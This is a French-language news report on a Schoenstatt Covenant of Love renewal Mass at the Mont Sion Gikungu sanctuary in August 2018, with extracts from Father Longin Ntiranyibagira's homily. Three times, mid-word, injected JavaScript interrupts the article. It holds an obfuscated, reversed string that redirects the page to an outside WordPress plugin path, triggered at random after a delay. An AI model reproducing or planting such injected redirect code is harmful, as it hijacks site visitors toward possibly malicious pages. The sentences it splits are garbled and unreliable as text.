Au lendemain de la célébration de la solennité de l’Assomption, le Sanctuaire marial de Schoenstatt Mont Sion Gikungu a célébré le renouvèlement de l’Alliance d’Amour. C’était le samedi 18 août 2018, dans la célébration eucharistique qui a débuté à onze heures dans le Sanctuaire marial, présidée par le Père Longin Ntiranyibagira.
« Nous continuons à rendre grâce à Dieu pour l’Assomption de la Vierge Marie, notre Mère, et nous ne nous lasserons point de fêter avec Elle », a introduit le Père Longin. « Si Jésus nous dit : »le royaume de Dieu appartient aux petits enfants », il ne nous demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande pas cependant d’avoir des comportements puérils. Nous sommes par ailleurs appelés à avoir un cœur d’enfant, des enfants de la Vierge Marie », a-t-il souligné dans son homélie. Le Père Longin a rappelé aux pèlerins que si Dieu a pris la condition d’enfant, en naissant de la Vierge Marie pour nous parvenir, nous devons nous aussi avoir un cœur d’enfant pour parvenir à Dieu et à Marie. Dieu nous a aimés le premier, c’est notre tour de lui rendre cet amour, a-t-il poursuivi.
Avant de clore son homélie, le Père Longin Ntiranyibagira a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné quelques qualités d’un enfant, entre autre la confiance et la contemplation de ses parents. Dans notre foi, a-t-il émis, nous devons avoir ces qualités d’enfant pour mériter le royaume de Dieu. Dieu aime les humbles, d’où le choix de Marie, de qui nous avons bénéficié toutes les grâces, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le salut éternel, a-t-il conclu. Les cérémonies se sont poursuivi avec l’acte de brûler les contributions au capital de grâces. Et la célébration eucharistique a poursuivi son cours normal.
Diomède Mujojoma